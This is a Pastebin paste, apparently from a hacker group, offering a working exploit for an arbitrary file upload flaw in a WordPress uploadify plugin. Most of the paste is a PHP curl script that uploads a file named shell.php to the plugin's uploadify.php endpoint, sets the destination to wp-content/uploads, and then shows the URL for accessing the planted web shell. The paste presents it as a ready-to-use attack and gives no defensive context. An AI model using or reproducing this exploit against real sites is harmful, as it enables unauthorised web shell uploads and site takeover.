Advertisement
zeeshan-haxor-zesn

Wordpress uploadify Arbitrary file upload vulnerability

Mar 14th, 2017
434
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.74 KB | None | 0 0
  1. [+] Wordpress uploadify Arbitrary file upload vulnerability
  2. [+] old But Gold
  3. ./Zeeshan Haxor
  4. ./CyberTeamRox
  5.  
  6. Upload.php
  7. <?php
  8.  
  9. $uploadfile="shell.php"; //your file name or shell name
  10. $ch = curl_init("http://www.example.com/wordpress/wp-content/plugins/uploader/uploadify/uploadify.php");
  11. curl_setopt($ch, CURLOPT_POST, true);
  12. curl_setopt($ch, CURLOPT_POSTFIELDS,
  13. array('Filedata'=>"@$uploadfile",
  14. 'folder'=>"/wordpress/wp-content/uploads",
  15. 'fileext'=>'php'));
  16. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  17. $postResult = curl_exec($ch);
  18. curl_close($ch);
  19. print "$postResult";
  20.  
  21. ?>
  22.  
  23. Shell Access :
  24. http://www.example.com/wordpress/wp-content/uploads/shell.php //shell will be go here
  25.  
  26. shell.php
  27. <?php
  28. echo 'CyberTeamRox';
  29. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement